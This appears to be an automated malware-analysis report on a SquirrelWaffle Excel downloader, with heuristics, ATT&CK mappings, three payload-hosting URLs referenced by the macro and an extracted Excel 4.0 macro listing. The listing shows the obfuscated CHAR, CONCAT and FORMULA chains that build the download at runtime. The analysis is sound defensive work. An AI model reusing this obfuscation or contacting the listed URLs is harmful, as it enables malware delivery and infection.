MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The file contains Excel 4.0 macros, including an Auto_Open defined name, which is a strong indicator of malicious intent. The macros reconstruct and reference three URLs, likely to download and execute a second-stage payload. ClamAV also identified the file as Xls.Downloader.SquirrelWaffle, supporting the downloader classification.
Heuristics 7
-
ClamAV: Xls.Downloader.SquirrelWaffle1021-9903731-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Downloader.SquirrelWaffle1021-9903731-0
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
URL reconstructed from XLM cell array (3 URLs) critical OLE_XLM_CELL_ARRAY_URLExcel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
-
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://dharmasasthatrust.com/cEJYcStqlAf/hr.html Referenced by macro
- https://shalsa3d.com/UGqWNCLT/hr.htmlReferenced by macro
- https://haroldhallroofing.net/pAz8O63Gn/hr.htmlReferenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 8702 bytes |
SHA-256: e515aea77033b51661d68793c809b89632ac2f97755cd11b999a378d8e47fb92 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Shee
' 0085 11 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - HB
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Symmm
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Syym
' 0085 10 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - R
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - Syyb
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - Syyb
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - Syyb
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - Syyb
' 0018 29 LABEL : Cell Value, String Constant - _xlfn.ARABIC hidden len=2 ptgErr *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018 29 LABEL : Cell Value, String Constant - _xlfn.CONCAT hidden len=2 ptgErr *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d HB!D1
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' Symmm,Q1,CHAR(102/2),""
' Symmm,E2,CHAR(216/2),""
' Symmm,K2,CHAR(35*2),""
' Symmm,S2,CHAR(100-35),""
' Symmm,B3,CHAR(236-118),""
' Symmm,I3,CHAR(238/2),""
' Symmm,O3,CHAR(134/2),""
' Symmm,U3,"",5.00000000000000000000
' Symmm,A4,CHAR(228/2),""
' Symmm,M4,CHAR(148/2),""
' Symmm,Q4,"",1.00000000000000000000
' Symmm,T4,CHAR(42*2),""
' Symmm,J5,CHAR(52*2),""
' Symmm,S5,CHAR(100/2),""
' Symmm,D6,CHAR(185-110),""
' Symmm,Q6,CHAR(220-111),""
' Symmm,L7,CHAR(170/2),""
' Symmm,V7,CHAR(224/2),""
' Symmm,G8,CHAR(109-40),""
' Symmm,M8,CHAR(200-100),""
' Symmm,P8,CHAR(232/2),""
' Symmm,T9,CHAR(194/2),""
' Symmm,F10,CHAR(203-102),""
' Symmm,K10,CHAR(164-82),""
' Symmm,B11,CHAR(220/2),""
' Symmm,O11,CHAR(96/2),""
' Symmm,Q11,CHAR(136/2),""
' Symmm,H13,CHAR(166/2),""
' Symmm,L13,CHAR(33*2),""
' Symmm,S13,CHAR(210/2),""
' Symmm,E14,CHAR(240-120),""
' Symmm,N14,CHAR(217-100),""
' Symmm,P15,CHAR(202-103),""
' Symmm,C16,CHAR(206-103),""
' Symmm,M16,CHAR(152-76),""
' Symmm,T16,CHAR(242/2),""
' Symmm,R17,CHAR(212-101),""
' Symmm,O18,CHAR(230/2),""
' Symmm,U21,"",1.00000000000000000000
' Symmm,O50,_xlfn.ARABIC("CI"),""
' Symmm,F52,_xlfn.ARABIC("CXI"),""
' Symmm,T52,_xlfn.ARABIC("LXXVI"),""
' Syym,M1,_xlfn.CONCAT( R!O11),""
' Syym,I3,"_xlfn.CONCAT( R!J41, R!H13, R!J5)",""
' Syym,O3,"_xlfn.CONCAT( R!J41, R!D6, R!F10, R!A4, R!B11, R!F10, R!E2, R!Q1, R!S5, R!J41, R!J43)",""
' Syym,F4,"_xlfn.CONCAT( R!J41, R!M4, R!M4, R!O3, R!O3, R!O3, R!M4, R!M4, R!J41, R!J43)",""
' Syym,S5,"_xlfn.CONCAT( R!J41, R!M4, R!O3, R!M4, R!J41, R!J43)",""
' Syym,R7,"_xlfn.CONCAT( R!O11, R!J43)",""
' Syym,C8,"_xlfn.CONCAT( R!J41, R!R17, R!V7, R!F10, R!B11, R!J41, R!J43)",""
' Syym,H9,"_xlfn.CONCAT( R!E2, R!E2, R!Q1, R!S5, R!J41, R!J43)",""
' Syym,L10,"_xlfn.CONCAT( R!J41, R!N14, R!A4, R!E2, R!Q6, R!R17, R!B11, R!J41, R!J43)",""
' Syym,Q11,"_xlfn.CONCAT( R!J41, R!O3, R!A4, R!F10, R!T9, R!P8, R!F10, R!Q11, R!S13, R!A4, R!F10, R!P15, R!P8, R!R17, R!A4, R!T16, R!S2, R!J41, R!J43)",""
' Syym,W11,_xlfn.CONCAT( Shee!Y21),""
' Syym,J12,"_xlfn.CONCAT( R!J41, R!M4, R!M4, R!O3, R!O3, R!L13, R!L13, R!J41, R!J43)",""
' Syym,D13,"_xlfn.CONCAT( R!J41, R!H13, R!J5, R!F10, R!E2, R!E2, R!G8, R!E14, R!F10, R!P15, R!N14, R!P8, R!F10, R!S2, R!J41, R!J43)",""
' Syym,Y13,"_xlfn.CONCAT( Shee!T51, Shee!N16, Shee!P20, Shee!K14, Shee!L21, Shee!P20, Shee!O12, Shee!BA11, Shee!BC15, Shee!T51, Shee!T53)",""
' Syym,O14,"_xlfn.CONCAT( R!J41, R!O3, R!L41, R!L43, R!Q11, R!T9, R!P8, R!R17, R!V7, R!J41, R!J43)",""
' Syym,K15,"_xlfn.CONCAT( R!S2, R!J41, R!J43)",""
' Syym,R17,"_xlfn.CONCAT( R!J41, R!L7, R!K10, R!M16, R!Q11, R!R17, R!I3, R!B11, R!E2, R!R17, R!T9, R!M8, R!T4)",""
' Syym,BB17,"_xlfn.CONCAT( Shee!Y21, Shee!T53)",""
' Syym,J19,"_xlfn.CONCAT( R!J41, R!O3, R!L41, R!L43, R!Q11, R!T9, R!P8, R!R17, R!V7, R!L43, R!P8, R!F10, R!O18, R!P8, R!L45, R!P8, R!F10, R!O18, R!P8, R!J41, R!J43)",""
' Syym,B21,"_xlfn.CONCAT( R!J41, R!A4)",""
' Syym,M21,_xlfn.CONCAT( R!U3),""
' Syym,BA21,"_xlfn.CONCAT( Shee!T51, Shee!Y13, Shee!K14, Shee!P20, Shee!BD19, Shee!Z18, Shee!P20, Shee!BA21, Shee!BC23, Shee!K14, Shee!P20, Shee!Z25, Shee!Z18, Shee!BB27, Shee!K14, Shee!BD26, Shee!BC12, Shee!T51, Shee!T53)",""
' Syym,P23,"_xlfn.CONCAT( R!J41, R!O3, R!L41, R!L43, R!Q11, R!T9, R!P8, R!R17, R!V7, R!L43, R!P8, R!F10, R!O18, R!P8, R!Q4, R!L45, R!P8, R!F10, R!O18, R!P8, R!J41, R!J43)",""
' Syym,C24,"_xlfn.CONCAT( R!K2, R!S13, R!E2)",""
' Syym,Y24,"_xlfn.CONCAT( Shee!T51, Shee!Y13, Shee!V51, Shee!V53, Shee!BA21, Shee!BD19, Shee!Z18, Shee!BB27, Shee!BF17, Shee!T51, Shee!T53)",""
' Syym,F25,"_xlfn.CONCAT( R!C16, R!O18, R!B3, R!A4, R!Q1, R!S5, R!J41, R!J43)",""
' Syym,D27,"_xlfn.CONCAT( R!J41, R!O3, R!L41, R!L43, R!Q11, R!T9, R!P8, R!R17, R!V7, R!L43, R!P8, R!F10, R!O18, R!P8, R!S5, R!L45, R!P8, R!F10, R!O18, R!P8, R!J41, R!J43)",""
' Syym,W31,_xlfn.CONCAT( Shee!BE13),""
' Syym,BC32,"_xlfn.CONCAT( Shee!T51, Shee!Y13, Shee!V51, Shee!V53, Shee!BA21, Shee!BD19, Shee!Z18, Shee!BB27, Shee!BF17, Shee!V53, Shee!Z18, Shee!P20, Shee!Y28, Shee!Z18, Shee!BE31, Shee!V55, Shee!Z18, Shee!P20, Shee!Y28, Shee!Z18, Shee!T51, Shee!T53)",""
' R,D12,"FORMULA( Syyb!E14, Syyb!B23)=FORMULA( Syyb!F14, Syyb!J6)=FORMULA( Syyb!I12, Syyb!D4)=FORMULA( Symmm!O3, Syym!F13)=FORMULA( Symmm!Q11, Syym!F14)=FORMULA.FILL( Symmm!S5, Syym!F15)=FORMULA.FILL( Symmm!R17& Syyb!B23& Symmm!C24& Syyb!J6& Symmm!K15, Syym!F19)=FORMULA.FILL( Symmm!O14, Syym!F16)=FORMULA( Symmm!M1, Syym!F17)=FORMULA( Symmm!L10, Syym!F18)=FORMULA.FILL( Symmm!J12, Syym!F20)=FORMULA( Symmm!R7, Syym!F21)=FORMULA( Symmm!J19, Syym!F22)=FORMULA( Symmm!I3& Syyb!J6& Symmm!H9, Syym!F23)=FORMULA( Symmm!D13, Syym!F24)=FORMULA( Symmm!F4, Syym!F25)=FORMULA( Symmm!C8, Syym!F26)=FORMULA( Symmm!B21& Syyb!J6& Symmm!F25, Syym!F27)=FORMULA( Symmm!M21, Syym!F28)=FORMULA( Symmm!P23, Syym!F30)=FORMULA( Symmm!D27, Syym!F32)=FORMULA( R!I63& R!I65& R!I66& Syyb!D4& Syyb!D4& R!I69& Syym!F13& Syym!F14& Syym!F15& Syym!F16& Syym!F17& R!I70, HB!D17)=FORMULA( R!I63& R!I65& R!I66& Syyb!D4& Syyb!D4& R!I69& Syym!F18& Syym!F19& Syym!F20& Syym!F21& Symmm!G31& Syym!F22& Syym!F21& Syym!F17& R!I70, HB!D19)=FORMULA( R!I63& R!I65& R!I66& Syyb!D4& Syyb!D4& R!I69& Syym!F18& Syym!F19& Syym!F20& Syym!F21& Symmm!G33& Syym!F30& Syym!F21& Syym!F17& R!I70, HB!D22)=FORMULA( R!I63& R!I65& R!I66& Syyb!D4& Syyb!D4& R!I69& Syym!F18& Syym!F19& Syym!F20& Syym!F21& Symmm!G35& Syym!F32& Syym!F21& Syym!F17& R!I70, HB!D24)=FORMULA( R!I63& R!I65& R!I66& Syyb!D4& Syyb!D4& R!I69& Syym!F23& Syym!F24& Syym!F25& Syym!F21& Syym!F26& Syym!F27& Syym!F22& Syym!F21& Syym!F28& R!I70, HB!D26)=FORMULA( R!I63& R!I65& R!I66& Syyb!D4& Syyb!D4& R!I69& Syym!F23& Syym!F24& Syym!F25& Syym!F21& Syym!F26& Syym!F27& Syym!F30& Syym!F21& Syym!F28& R!I70, HB!D28)=FORMULA( R!I63& R!I65& R!I66& Syyb!D4& Syyb!D4& R!I69& Syym!F23& Syym!F24& Syym!F25& Syym!F21& Syym!F26& Syym!F27& Syym!F32& Syym!F21& Syym!F28& R!I70, HB!D30)",""
' Syyb,E14,CHAR( R!F52),""
' Syyb,F14,CHAR( R!O50),""
' Syyb,I12,CHAR( R!T52),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.